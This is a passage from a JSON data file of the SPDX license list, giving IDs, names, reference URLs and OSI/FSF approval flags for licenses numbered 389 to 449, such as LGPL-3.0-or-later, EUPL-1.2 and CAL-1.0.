4844 "http://www.json.org/license.html"
4845 ],
4846 "isOsiApproved": false
4847 },
4848 {
4849 "reference": "https://spdx.org/licenses/LGPL-3.0-or-later.html",
4850 "isDeprecatedLicenseId": false,
4851 "detailsUrl": "https://spdx.org/licenses/LGPL-3.0-or-later.json",
4852 "referenceNumber": 389,
4853 "name": "GNU Lesser General Public License v3.0 or later",
4854 "licenseId": "LGPL-3.0-or-later",
4855 "seeAlso": [
4856 "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
4857 "https://opensource.org/licenses/LGPL-3.0"
4858 ],
4859 "isOsiApproved": true,
4860 "isFsfLibre": true
4861 },
4862 {
4863 "reference": "https://spdx.org/licenses/GPL-3.0.html",
4864 "isDeprecatedLicenseId": true,
4865 "detailsUrl": "https://spdx.org/licenses/GPL-3.0.json",
4866 "referenceNumber": 390,
4867 "name": "GNU General Public License v3.0 only",
4868 "licenseId": "GPL-3.0",
4869 "seeAlso": [
4870 "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
4871 "https://opensource.org/licenses/GPL-3.0"
4872 ],
4873 "isOsiApproved": true,
4874 "isFsfLibre": true
4875 },
4876 {
4877 "reference": "https://spdx.org/licenses/Fair.html",
4878 "isDeprecatedLicenseId": false,
4879 "detailsUrl": "https://spdx.org/licenses/Fair.json",
4880 "referenceNumber": 391,
4881 "name": "Fair License",
4882 "licenseId": "Fair",
4883 "seeAlso": [
4884 "http://fairlicense.org/",
4885 "https://opensource.org/licenses/Fair"
4886 ],
4887 "isOsiApproved": true
4888 },
4889 {
4890 "reference": "https://spdx.org/licenses/GPL-2.0-with-font-exception.html",
4891 "isDeprecatedLicenseId": true,
4892 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-font-exception.json",
4893 "referenceNumber": 392,
4894 "name": "GNU General Public License v2.0 w/Font exception",
4895 "licenseId": "GPL-2.0-with-font-exception",
4896 "seeAlso": [
4897 "https://www.gnu.org/licenses/gpl-faq.html#FontException"
4898 ],
4899 "isOsiApproved": false
4900 },
4901 {
4902 "reference": "https://spdx.org/licenses/OSL-2.1.html",
4903 "isDeprecatedLicenseId": false,
4904 "detailsUrl": "https://spdx.org/licenses/OSL-2.1.json",
4905 "referenceNumber": 393,
4906 "name": "Open Software License 2.1",
4907 "licenseId": "OSL-2.1",
4908 "seeAlso": [
4909 "http://web.archive.org/web/20050212003940/http://www.rosenlaw.com/osl21.htm",
4910 "https://opensource.org/licenses/OSL-2.1"
4911 ],
4912 "isOsiApproved": true,
4913 "isFsfLibre": true
4914 },
4915 {
4916 "reference": "https://spdx.org/licenses/LPPL-1.3a.html",
4917 "isDeprecatedLicenseId": false,
4918 "detailsUrl": "https://spdx.org/licenses/LPPL-1.3a.json",
4919 "referenceNumber": 394,
4920 "name": "LaTeX Project Public License v1.3a",
4921 "licenseId": "LPPL-1.3a",
4922 "seeAlso": [
4923 "http://www.latex-project.org/lppl/lppl-1-3a.txt"
4924 ],
4925 "isOsiApproved": false,
4926 "isFsfLibre": true
4927 },
4928 {
4929 "reference": "https://spdx.org/licenses/NAIST-2003.html",
4930 "isDeprecatedLicenseId": false,
4931 "detailsUrl": "https://spdx.org/licenses/NAIST-2003.json",
4932 "referenceNumber": 395,
4933 "name": "Nara Institute of Science and Technology License (2003)",
4934 "licenseId": "NAIST-2003",
4935 "seeAlso": [
4936 "https://enterprise.dejacode.com/licenses/public/naist-2003/#license-text",
4937 "https://github.com/nodejs/node/blob/4a19cc8947b1bba2b2d27816ec3d0edf9b28e503/LICENSE#L343"
4938 ],
4939 "isOsiApproved": false
4940 },
4941 {
4942 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-4.0.html",
4943 "isDeprecatedLicenseId": false,
4944 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-4.0.json",
4945 "referenceNumber": 396,
4946 "name": "Creative Commons Attribution Non Commercial No Derivatives 4.0 International",
4947 "licenseId": "CC-BY-NC-ND-4.0",
4948 "seeAlso": [
4949 "https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode"
4950 ],
4951 "isOsiApproved": false
4952 },
4953 {
4954 "reference": "https://spdx.org/licenses/CC-BY-NC-3.0-DE.html",
4955 "isDeprecatedLicenseId": false,
4956 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-3.0-DE.json",
4957 "referenceNumber": 397,
4958 "name": "Creative Commons Attribution Non Commercial 3.0 Germany",
4959 "licenseId": "CC-BY-NC-3.0-DE",
4960 "seeAlso": [
4961 "https://creativecommons.org/licenses/by-nc/3.0/de/legalcode"
4962 ],
4963 "isOsiApproved": false
4964 },
4965 {
4966 "reference": "https://spdx.org/licenses/LGPL-2.1+.html",
4967 "isDeprecatedLicenseId": true,
4968 "detailsUrl": "https://spdx.org/licenses/LGPL-2.1+.json",
4969 "referenceNumber": 398,
4970 "name": "GNU Library General Public License v2.1 or later",
4971 "licenseId": "LGPL-2.1+",
4972 "seeAlso": [
4973 "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
4974 "https://opensource.org/licenses/LGPL-2.1"
4975 ],
4976 "isOsiApproved": true
4977 },
4978 {
4979 "reference": "https://spdx.org/licenses/OPL-1.0.html",
4980 "isDeprecatedLicenseId": false,
4981 "detailsUrl": "https://spdx.org/licenses/OPL-1.0.json",
4982 "referenceNumber": 399,
4983 "name": "Open Public License v1.0",
4984 "licenseId": "OPL-1.0",
4985 "seeAlso": [
4986 "http://old.koalateam.com/jackaroo/OPL_1_0.TXT",
4987 "https://fedoraproject.org/wiki/Licensing/Open_Public_License"
4988 ],
4989 "isOsiApproved": false
4990 },
4991 {
4992 "reference": "https://spdx.org/licenses/HPND-sell-variant.html",
4993 "isDeprecatedLicenseId": false,
4994 "detailsUrl": "https://spdx.org/licenses/HPND-sell-variant.json",
4995 "referenceNumber": 400,
4996 "name": "Historical Permission Notice and Disclaimer - sell variant",
4997 "licenseId": "HPND-sell-variant",
4998 "seeAlso": [
4999 "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/sunrpc/auth_gss/gss_generic_token.c?h\u003dv4.19"
5000 ],
5001 "isOsiApproved": false
5002 },
5003 {
5004 "reference": "https://spdx.org/licenses/QPL-1.0.html",
5005 "isDeprecatedLicenseId": false,
5006 "detailsUrl": "https://spdx.org/licenses/QPL-1.0.json",
5007 "referenceNumber": 401,
5008 "name": "Q Public License 1.0",
5009 "licenseId": "QPL-1.0",
5010 "seeAlso": [
5011 "http://doc.qt.nokia.com/3.3/license.html",
5012 "https://opensource.org/licenses/QPL-1.0"
5013 ],
5014 "isOsiApproved": true,
5015 "isFsfLibre": true
5016 },
5017 {
5018 "reference": "https://spdx.org/licenses/EUPL-1.2.html",
5019 "isDeprecatedLicenseId": false,
5020 "detailsUrl": "https://spdx.org/licenses/EUPL-1.2.json",
5021 "referenceNumber": 402,
5022 "name": "European Union Public License 1.2",
5023 "licenseId": "EUPL-1.2",
5024 "seeAlso": [
5025 "https://joinup.ec.europa.eu/page/eupl-text-11-12",
5026 "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/eupl_v1.2_en.pdf",
5027 "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/2020-03/EUPL-1.2%20EN.txt",
5028 "https://joinup.ec.europa.eu/sites/default/files/inline-files/EUPL%20v1_2%20EN(1).txt",
5029 "http://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri\u003dCELEX:32017D0863",
5030 "https://opensource.org/licenses/EUPL-1.2"
5031 ],
5032 "isOsiApproved": true
5033 },
5034 {
5035 "reference": "https://spdx.org/licenses/GFDL-1.2-no-invariants-or-later.html",
5036 "isDeprecatedLicenseId": false,
5037 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-no-invariants-or-later.json",
5038 "referenceNumber": 403,
5039 "name": "GNU Free Documentation License v1.2 or later - no invariants",
5040 "licenseId": "GFDL-1.2-no-invariants-or-later",
5041 "seeAlso": [
5042 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
5043 ],
5044 "isOsiApproved": false
5045 },
5046 {
5047 "reference": "https://spdx.org/licenses/eCos-2.0.html",
5048 "isDeprecatedLicenseId": true,
5049 "detailsUrl": "https://spdx.org/licenses/eCos-2.0.json",
5050 "referenceNumber": 404,
5051 "name": "eCos license version 2.0",
5052 "licenseId": "eCos-2.0",
5053 "seeAlso": [
5054 "https://www.gnu.org/licenses/ecos-license.html"
5055 ],
5056 "isOsiApproved": false
5057 },
5058 {
5059 "reference": "https://spdx.org/licenses/NCGL-UK-2.0.html",
5060 "isDeprecatedLicenseId": false,
5061 "detailsUrl": "https://spdx.org/licenses/NCGL-UK-2.0.json",
5062 "referenceNumber": 405,
5063 "name": "Non-Commercial Government Licence",
5064 "licenseId": "NCGL-UK-2.0",
5065 "seeAlso": [
5066 "http://www.nationalarchives.gov.uk/doc/non-commercial-government-licence/version/2/"
5067 ],
5068 "isOsiApproved": false
5069 },
5070 {
5071 "reference": "https://spdx.org/licenses/Beerware.html",
5072 "isDeprecatedLicenseId": false,
5073 "detailsUrl": "https://spdx.org/licenses/Beerware.json",
5074 "referenceNumber": 406,
5075 "name": "Beerware License",
5076 "licenseId": "Beerware",
5077 "seeAlso": [
5078 "https://fedoraproject.org/wiki/Licensing/Beerware",
5079 "https://people.freebsd.org/~phk/"
5080 ],
5081 "isOsiApproved": false
5082 },
5083 {
5084 "reference": "https://spdx.org/licenses/BSD-3-Clause-Open-MPI.html",
5085 "isDeprecatedLicenseId": false,
5086 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Open-MPI.json",
5087 "referenceNumber": 407,
5088 "name": "BSD 3-Clause Open MPI variant",
5089 "licenseId": "BSD-3-Clause-Open-MPI",
5090 "seeAlso": [
5091 "https://www.open-mpi.org/community/license.php",
5092 "http://www.netlib.org/lapack/LICENSE.txt"
5093 ],
5094 "isOsiApproved": false
5095 },
5096 {
5097 "reference": "https://spdx.org/licenses/GPL-2.0-with-bison-exception.html",
5098 "isDeprecatedLicenseId": true,
5099 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-bison-exception.json",
5100 "referenceNumber": 408,
5101 "name": "GNU General Public License v2.0 w/Bison exception",
5102 "licenseId": "GPL-2.0-with-bison-exception",
5103 "seeAlso": [
5104 "http://git.savannah.gnu.org/cgit/bison.git/tree/data/yacc.c?id\u003d193d7c7054ba7197b0789e14965b739162319b5e#n141"
5105 ],
5106 "isOsiApproved": false
5107 },
5108 {
5109 "reference": "https://spdx.org/licenses/CECILL-B.html",
5110 "isDeprecatedLicenseId": false,
5111 "detailsUrl": "https://spdx.org/licenses/CECILL-B.json",
5112 "referenceNumber": 409,
5113 "name": "CeCILL-B Free Software License Agreement",
5114 "licenseId": "CECILL-B",
5115 "seeAlso": [
5116 "http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html"
5117 ],
5118 "isOsiApproved": false,
5119 "isFsfLibre": true
5120 },
5121 {
5122 "reference": "https://spdx.org/licenses/GPL-2.0-with-autoconf-exception.html",
5123 "isDeprecatedLicenseId": true,
5124 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-autoconf-exception.json",
5125 "referenceNumber": 410,
5126 "name": "GNU General Public License v2.0 w/Autoconf exception",
5127 "licenseId": "GPL-2.0-with-autoconf-exception",
5128 "seeAlso": [
5129 "http://ac-archive.sourceforge.net/doc/copyright.html"
5130 ],
5131 "isOsiApproved": false
5132 },
5133 {
5134 "reference": "https://spdx.org/licenses/EPL-2.0.html",
5135 "isDeprecatedLicenseId": false,
5136 "detailsUrl": "https://spdx.org/licenses/EPL-2.0.json",
5137 "referenceNumber": 411,
5138 "name": "Eclipse Public License 2.0",
5139 "licenseId": "EPL-2.0",
5140 "seeAlso": [
5141 "https://www.eclipse.org/legal/epl-2.0",
5142 "https://www.opensource.org/licenses/EPL-2.0"
5143 ],
5144 "isOsiApproved": true,
5145 "isFsfLibre": true
5146 },
5147 {
5148 "reference": "https://spdx.org/licenses/MIT-feh.html",
5149 "isDeprecatedLicenseId": false,
5150 "detailsUrl": "https://spdx.org/licenses/MIT-feh.json",
5151 "referenceNumber": 412,
5152 "name": "feh License",
5153 "licenseId": "MIT-feh",
5154 "seeAlso": [
5155 "https://fedoraproject.org/wiki/Licensing/MIT#feh"
5156 ],
5157 "isOsiApproved": false
5158 },
5159 {
5160 "reference": "https://spdx.org/licenses/RPL-1.1.html",
5161 "isDeprecatedLicenseId": false,
5162 "detailsUrl": "https://spdx.org/licenses/RPL-1.1.json",
5163 "referenceNumber": 413,
5164 "name": "Reciprocal Public License 1.1",
5165 "licenseId": "RPL-1.1",
5166 "seeAlso": [
5167 "https://opensource.org/licenses/RPL-1.1"
5168 ],
5169 "isOsiApproved": true
5170 },
5171 {
5172 "reference": "https://spdx.org/licenses/CDLA-Permissive-1.0.html",
5173 "isDeprecatedLicenseId": false,
5174 "detailsUrl": "https://spdx.org/licenses/CDLA-Permissive-1.0.json",
5175 "referenceNumber": 414,
5176 "name": "Community Data License Agreement Permissive 1.0",
5177 "licenseId": "CDLA-Permissive-1.0",
5178 "seeAlso": [
5179 "https://cdla.io/permissive-1-0"
5180 ],
5181 "isOsiApproved": false
5182 },
5183 {
5184 "reference": "https://spdx.org/licenses/Python-2.0.html",
5185 "isDeprecatedLicenseId": false,
5186 "detailsUrl": "https://spdx.org/licenses/Python-2.0.json",
5187 "referenceNumber": 415,
5188 "name": "Python License 2.0",
5189 "licenseId": "Python-2.0",
5190 "seeAlso": [
5191 "https://opensource.org/licenses/Python-2.0"
5192 ],
5193 "isOsiApproved": true,
5194 "isFsfLibre": true
5195 },
5196 {
5197 "reference": "https://spdx.org/licenses/MPL-1.0.html",
5198 "isDeprecatedLicenseId": false,
5199 "detailsUrl": "https://spdx.org/licenses/MPL-1.0.json",
5200 "referenceNumber": 416,
5201 "name": "Mozilla Public License 1.0",
5202 "licenseId": "MPL-1.0",
5203 "seeAlso": [
5204 "http://www.mozilla.org/MPL/MPL-1.0.html",
5205 "https://opensource.org/licenses/MPL-1.0"
5206 ],
5207 "isOsiApproved": true
5208 },
5209 {
5210 "reference": "https://spdx.org/licenses/GFDL-1.1-or-later.html",
5211 "isDeprecatedLicenseId": false,
5212 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-or-later.json",
5213 "referenceNumber": 417,
5214 "name": "GNU Free Documentation License v1.1 or later",
5215 "licenseId": "GFDL-1.1-or-later",
5216 "seeAlso": [
5217 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
5218 ],
5219 "isOsiApproved": false,
5220 "isFsfLibre": true
5221 },
5222 {
5223 "reference": "https://spdx.org/licenses/diffmark.html",
5224 "isDeprecatedLicenseId": false,
5225 "detailsUrl": "https://spdx.org/licenses/diffmark.json",
5226 "referenceNumber": 418,
5227 "name": "diffmark license",
5228 "licenseId": "diffmark",
5229 "seeAlso": [
5230 "https://fedoraproject.org/wiki/Licensing/diffmark"
5231 ],
5232 "isOsiApproved": false
5233 },
5234 {
5235 "reference": "https://spdx.org/licenses/GPL-1.0+.html",
5236 "isDeprecatedLicenseId": true,
5237 "detailsUrl": "https://spdx.org/licenses/GPL-1.0+.json",
5238 "referenceNumber": 419,
5239 "name": "GNU General Public License v1.0 or later",
5240 "licenseId": "GPL-1.0+",
5241 "seeAlso": [
5242 "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
5243 ],
5244 "isOsiApproved": false
5245 },
5246 {
5247 "reference": "https://spdx.org/licenses/OpenSSL.html",
5248 "isDeprecatedLicenseId": false,
5249 "detailsUrl": "https://spdx.org/licenses/OpenSSL.json",
5250 "referenceNumber": 420,
5251 "name": "OpenSSL License",
5252 "licenseId": "OpenSSL",
5253 "seeAlso": [
5254 "http://www.openssl.org/source/license.html"
5255 ],
5256 "isOsiApproved": false,
5257 "isFsfLibre": true
5258 },
5259 {
5260 "reference": "https://spdx.org/licenses/OSL-1.0.html",
5261 "isDeprecatedLicenseId": false,
5262 "detailsUrl": "https://spdx.org/licenses/OSL-1.0.json",
5263 "referenceNumber": 421,
5264 "name": "Open Software License 1.0",
5265 "licenseId": "OSL-1.0",
5266 "seeAlso": [
5267 "https://opensource.org/licenses/OSL-1.0"
5268 ],
5269 "isOsiApproved": true,
5270 "isFsfLibre": true
5271 },
5272 {
5273 "reference": "https://spdx.org/licenses/Parity-6.0.0.html",
5274 "isDeprecatedLicenseId": false,
5275 "detailsUrl": "https://spdx.org/licenses/Parity-6.0.0.json",
5276 "referenceNumber": 422,
5277 "name": "The Parity Public License 6.0.0",
5278 "licenseId": "Parity-6.0.0",
5279 "seeAlso": [
5280 "https://paritylicense.com/versions/6.0.0.html"
5281 ],
5282 "isOsiApproved": false
5283 },
5284 {
5285 "reference": "https://spdx.org/licenses/AGPL-1.0.html",
5286 "isDeprecatedLicenseId": true,
5287 "detailsUrl": "https://spdx.org/licenses/AGPL-1.0.json",
5288 "referenceNumber": 423,
5289 "name": "Affero General Public License v1.0",
5290 "licenseId": "AGPL-1.0",
5291 "seeAlso": [
5292 "http://www.affero.org/oagpl.html"
5293 ],
5294 "isOsiApproved": false,
5295 "isFsfLibre": true
5296 },
5297 {
5298 "reference": "https://spdx.org/licenses/YPL-1.1.html",
5299 "isDeprecatedLicenseId": false,
5300 "detailsUrl": "https://spdx.org/licenses/YPL-1.1.json",
5301 "referenceNumber": 424,
5302 "name": "Yahoo! Public License v1.1",
5303 "licenseId": "YPL-1.1",
5304 "seeAlso": [
5305 "http://www.zimbra.com/license/yahoo_public_license_1.1.html"
5306 ],
5307 "isOsiApproved": false,
5308 "isFsfLibre": true
5309 },
5310 {
5311 "reference": "https://spdx.org/licenses/SSH-short.html",
5312 "isDeprecatedLicenseId": false,
5313 "detailsUrl": "https://spdx.org/licenses/SSH-short.json",
5314 "referenceNumber": 425,
5315 "name": "SSH short notice",
5316 "licenseId": "SSH-short",
5317 "seeAlso": [
5318 "https://github.com/openssh/openssh-portable/blob/1b11ea7c58cd5c59838b5fa574cd456d6047b2d4/pathnames.h",
5319 "http://web.mit.edu/kolya/.f/root/athena.mit.edu/sipb.mit.edu/project/openssh/OldFiles/src/openssh-2.9.9p2/ssh-add.1",
5320 "https://joinup.ec.europa.eu/svn/lesoll/trunk/italc/lib/src/dsa_key.cpp"
5321 ],
5322 "isOsiApproved": false
5323 },
5324 {
5325 "reference": "https://spdx.org/licenses/IBM-pibs.html",
5326 "isDeprecatedLicenseId": false,
5327 "detailsUrl": "https://spdx.org/licenses/IBM-pibs.json",
5328 "referenceNumber": 426,
5329 "name": "IBM PowerPC Initialization and Boot Software",
5330 "licenseId": "IBM-pibs",
5331 "seeAlso": [
5332 "http://git.denx.de/?p\u003du-boot.git;a\u003dblob;f\u003darch/powerpc/cpu/ppc4xx/miiphy.c;h\u003d297155fdafa064b955e53e9832de93bfb0cfb85b;hb\u003d9fab4bf4cc077c21e43941866f3f2c196f28670d"
5333 ],
5334 "isOsiApproved": false
5335 },
5336 {
5337 "reference": "https://spdx.org/licenses/Xnet.html",
5338 "isDeprecatedLicenseId": false,
5339 "detailsUrl": "https://spdx.org/licenses/Xnet.json",
5340 "referenceNumber": 427,
5341 "name": "X.Net License",
5342 "licenseId": "Xnet",
5343 "seeAlso": [
5344 "https://opensource.org/licenses/Xnet"
5345 ],
5346 "isOsiApproved": true
5347 },
5348 {
5349 "reference": "https://spdx.org/licenses/TU-Berlin-1.0.html",
5350 "isDeprecatedLicenseId": false,
5351 "detailsUrl": "https://spdx.org/licenses/TU-Berlin-1.0.json",
5352 "referenceNumber": 428,
5353 "name": "Technische Universitaet Berlin License 1.0",
5354 "licenseId": "TU-Berlin-1.0",
5355 "seeAlso": [
5356 "https://github.com/swh/ladspa/blob/7bf6f3799fdba70fda297c2d8fd9f526803d9680/gsm/COPYRIGHT"
5357 ],
5358 "isOsiApproved": false
5359 },
5360 {
5361 "reference": "https://spdx.org/licenses/AGPL-3.0.html",
5362 "isDeprecatedLicenseId": true,
5363 "detailsUrl": "https://spdx.org/licenses/AGPL-3.0.json",
5364 "referenceNumber": 429,
5365 "name": "GNU Affero General Public License v3.0",
5366 "licenseId": "AGPL-3.0",
5367 "seeAlso": [
5368 "https://www.gnu.org/licenses/agpl.txt",
5369 "https://opensource.org/licenses/AGPL-3.0"
5370 ],
5371 "isOsiApproved": true,
5372 "isFsfLibre": true
5373 },
5374 {
5375 "reference": "https://spdx.org/licenses/CAL-1.0.html",
5376 "isDeprecatedLicenseId": false,
5377 "detailsUrl": "https://spdx.org/licenses/CAL-1.0.json",
5378 "referenceNumber": 430,
5379 "name": "Cryptographic Autonomy License 1.0",
5380 "licenseId": "CAL-1.0",
5381 "seeAlso": [
5382 "http://cryptographicautonomylicense.com/license-text.html",
5383 "https://opensource.org/licenses/CAL-1.0"
5384 ],
5385 "isOsiApproved": true
5386 },
5387 {
5388 "reference": "https://spdx.org/licenses/AFL-3.0.html",
5389 "isDeprecatedLicenseId": false,
5390 "detailsUrl": "https://spdx.org/licenses/AFL-3.0.json",
5391 "referenceNumber": 431,
5392 "name": "Academic Free License v3.0",
5393 "licenseId": "AFL-3.0",
5394 "seeAlso": [
5395 "http://www.rosenlaw.com/AFL3.0.htm",
5396 "https://opensource.org/licenses/afl-3.0"
5397 ],
5398 "isOsiApproved": true,
5399 "isFsfLibre": true
5400 },
5401 {
5402 "reference": "https://spdx.org/licenses/CECILL-C.html",
5403 "isDeprecatedLicenseId": false,
5404 "detailsUrl": "https://spdx.org/licenses/CECILL-C.json",
5405 "referenceNumber": 432,
5406 "name": "CeCILL-C Free Software License Agreement",
5407 "licenseId": "CECILL-C",
5408 "seeAlso": [
5409 "http://www.cecill.info/licences/Licence_CeCILL-C_V1-en.html"
5410 ],
5411 "isOsiApproved": false,
5412 "isFsfLibre": true
5413 },
5414 {
5415 "reference": "https://spdx.org/licenses/OGL-UK-3.0.html",
5416 "isDeprecatedLicenseId": false,
5417 "detailsUrl": "https://spdx.org/licenses/OGL-UK-3.0.json",
5418 "referenceNumber": 433,
5419 "name": "Open Government Licence v3.0",
5420 "licenseId": "OGL-UK-3.0",
5421 "seeAlso": [
5422 "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
5423 ],
5424 "isOsiApproved": false
5425 },
5426 {
5427 "reference": "https://spdx.org/licenses/BSD-3-Clause-Clear.html",
5428 "isDeprecatedLicenseId": false,
5429 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Clear.json",
5430 "referenceNumber": 434,
5431 "name": "BSD 3-Clause Clear License",
5432 "licenseId": "BSD-3-Clause-Clear",
5433 "seeAlso": [
5434 "http://labs.metacarta.com/license-explanation.html#license"
5435 ],
5436 "isOsiApproved": false,
5437 "isFsfLibre": true
5438 },
5439 {
5440 "reference": "https://spdx.org/licenses/BSD-3-Clause-Modification.html",
5441 "isDeprecatedLicenseId": false,
5442 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Modification.json",
5443 "referenceNumber": 435,
5444 "name": "BSD 3-Clause Modification",
5445 "licenseId": "BSD-3-Clause-Modification",
5446 "seeAlso": [
5447 "https://fedoraproject.org/wiki/Licensing:BSD#Modification_Variant"
5448 ],
5449 "isOsiApproved": false
5450 },
5451 {
5452 "reference": "https://spdx.org/licenses/CC-BY-SA-2.0-UK.html",
5453 "isDeprecatedLicenseId": false,
5454 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.0-UK.json",
5455 "referenceNumber": 436,
5456 "name": "Creative Commons Attribution Share Alike 2.0 England and Wales",
5457 "licenseId": "CC-BY-SA-2.0-UK",
5458 "seeAlso": [
5459 "https://creativecommons.org/licenses/by-sa/2.0/uk/legalcode"
5460 ],
5461 "isOsiApproved": false
5462 },
5463 {
5464 "reference": "https://spdx.org/licenses/Saxpath.html",
5465 "isDeprecatedLicenseId": false,
5466 "detailsUrl": "https://spdx.org/licenses/Saxpath.json",
5467 "referenceNumber": 437,
5468 "name": "Saxpath License",
5469 "licenseId": "Saxpath",
5470 "seeAlso": [
5471 "https://fedoraproject.org/wiki/Licensing/Saxpath_License"
5472 ],
5473 "isOsiApproved": false
5474 },
5475 {
5476 "reference": "https://spdx.org/licenses/NLPL.html",
5477 "isDeprecatedLicenseId": false,
5478 "detailsUrl": "https://spdx.org/licenses/NLPL.json",
5479 "referenceNumber": 438,
5480 "name": "No Limit Public License",
5481 "licenseId": "NLPL",
5482 "seeAlso": [
5483 "https://fedoraproject.org/wiki/Licensing/NLPL"
5484 ],
5485 "isOsiApproved": false
5486 },
5487 {
5488 "reference": "https://spdx.org/licenses/SimPL-2.0.html",
5489 "isDeprecatedLicenseId": false,
5490 "detailsUrl": "https://spdx.org/licenses/SimPL-2.0.json",
5491 "referenceNumber": 439,
5492 "name": "Simple Public License 2.0",
5493 "licenseId": "SimPL-2.0",
5494 "seeAlso": [
5495 "https://opensource.org/licenses/SimPL-2.0"
5496 ],
5497 "isOsiApproved": true
5498 },
5499 {
5500 "reference": "https://spdx.org/licenses/psfrag.html",
5501 "isDeprecatedLicenseId": false,
5502 "detailsUrl": "https://spdx.org/licenses/psfrag.json",
5503 "referenceNumber": 440,
5504 "name": "psfrag License",
5505 "licenseId": "psfrag",
5506 "seeAlso": [
5507 "https://fedoraproject.org/wiki/Licensing/psfrag"
5508 ],
5509 "isOsiApproved": false
5510 },
5511 {
5512 "reference": "https://spdx.org/licenses/Spencer-86.html",
5513 "isDeprecatedLicenseId": false,
5514 "detailsUrl": "https://spdx.org/licenses/Spencer-86.json",
5515 "referenceNumber": 441,
5516 "name": "Spencer License 86",
5517 "licenseId": "Spencer-86",
5518 "seeAlso": [
5519 "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License"
5520 ],
5521 "isOsiApproved": false
5522 },
5523 {
5524 "reference": "https://spdx.org/licenses/OCCT-PL.html",
5525 "isDeprecatedLicenseId": false,
5526 "detailsUrl": "https://spdx.org/licenses/OCCT-PL.json",
5527 "referenceNumber": 442,
5528 "name": "Open CASCADE Technology Public License",
5529 "licenseId": "OCCT-PL",
5530 "seeAlso": [
5531 "http://www.opencascade.com/content/occt-public-license"
5532 ],
5533 "isOsiApproved": false
5534 },
5535 {
5536 "reference": "https://spdx.org/licenses/CERN-OHL-S-2.0.html",
5537 "isDeprecatedLicenseId": false,
5538 "detailsUrl": "https://spdx.org/licenses/CERN-OHL-S-2.0.json",
5539 "referenceNumber": 443,
5540 "name": "CERN Open Hardware Licence Version 2 - Strongly Reciprocal",
5541 "licenseId": "CERN-OHL-S-2.0",
5542 "seeAlso": [
5543 "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
5544 ],
5545 "isOsiApproved": true
5546 },
5547 {
5548 "reference": "https://spdx.org/licenses/ErlPL-1.1.html",
5549 "isDeprecatedLicenseId": false,
5550 "detailsUrl": "https://spdx.org/licenses/ErlPL-1.1.json",
5551 "referenceNumber": 444,
5552 "name": "Erlang Public License v1.1",
5553 "licenseId": "ErlPL-1.1",
5554 "seeAlso": [
5555 "http://www.erlang.org/EPLICENSE"
5556 ],
5557 "isOsiApproved": false
5558 },
5559 {
5560 "reference": "https://spdx.org/licenses/MIT-CMU.html",
5561 "isDeprecatedLicenseId": false,
5562 "detailsUrl": "https://spdx.org/licenses/MIT-CMU.json",
5563 "referenceNumber": 445,
5564 "name": "CMU License",
5565 "licenseId": "MIT-CMU",
5566 "seeAlso": [
5567 "https://fedoraproject.org/wiki/Licensing:MIT?rd\u003dLicensing/MIT#CMU_Style",
5568 "https://github.com/python-pillow/Pillow/blob/fffb426092c8db24a5f4b6df243a8a3c01fb63cd/LICENSE"
5569 ],
5570 "isOsiApproved": false
5571 },
5572 {
5573 "reference": "https://spdx.org/licenses/NIST-PD.html",
5574 "isDeprecatedLicenseId": false,
5575 "detailsUrl": "https://spdx.org/licenses/NIST-PD.json",
5576 "referenceNumber": 446,
5577 "name": "NIST Public Domain Notice",
5578 "licenseId": "NIST-PD",
5579 "seeAlso": [
5580 "https://github.com/tcheneau/simpleRPL/blob/e645e69e38dd4e3ccfeceb2db8cba05b7c2e0cd3/LICENSE.txt",
5581 "https://github.com/tcheneau/Routing/blob/f09f46fcfe636107f22f2c98348188a65a135d98/README.md"
5582 ],
5583 "isOsiApproved": false
5584 },
5585 {
5586 "reference": "https://spdx.org/licenses/OSL-2.0.html",
5587 "isDeprecatedLicenseId": false,
5588 "detailsUrl": "https://spdx.org/licenses/OSL-2.0.json",
5589 "referenceNumber": 447,
5590 "name": "Open Software License 2.0",
5591 "licenseId": "OSL-2.0",
5592 "seeAlso": [
5593 "http://web.archive.org/web/20041020171434/http://www.rosenlaw.com/osl2.0.html"
5594 ],
5595 "isOsiApproved": true,
5596 "isFsfLibre": true
5597 },
5598 {
5599 "reference": "https://spdx.org/licenses/APSL-2.0.html",
5600 "isDeprecatedLicenseId": false,
5601 "detailsUrl": "https://spdx.org/licenses/APSL-2.0.json",
5602 "referenceNumber": 448,
5603 "name": "Apple Public Source License 2.0",
5604 "licenseId": "APSL-2.0",
5605 "seeAlso": [
5606 "http://www.opensource.apple.com/license/apsl/"
5607 ],
5608 "isOsiApproved": true,
5609 "isFsfLibre": true
5610 },
5611 {
5612 "reference": "https://spdx.org/licenses/Leptonica.html",
5613 "isDeprecatedLicenseId": false,
5614 "detailsUrl": "https://spdx.org/licenses/Leptonica.json",
5615 "referenceNumber": 449,
5616 "name": "Leptonica License",
5617 "licenseId": "Leptonica",
5618 "seeAlso": [
5619 "https://fedoraproject.org/wiki/Licensing/Leptonica"
5620 ],
5621 "isOsiApproved": false
5622 },
5623 {
5624 "reference": "https://spdx.org/licenses/PolyForm-Small-Business-1.0.0.html",
5625 "isDeprecatedLicenseId": false,
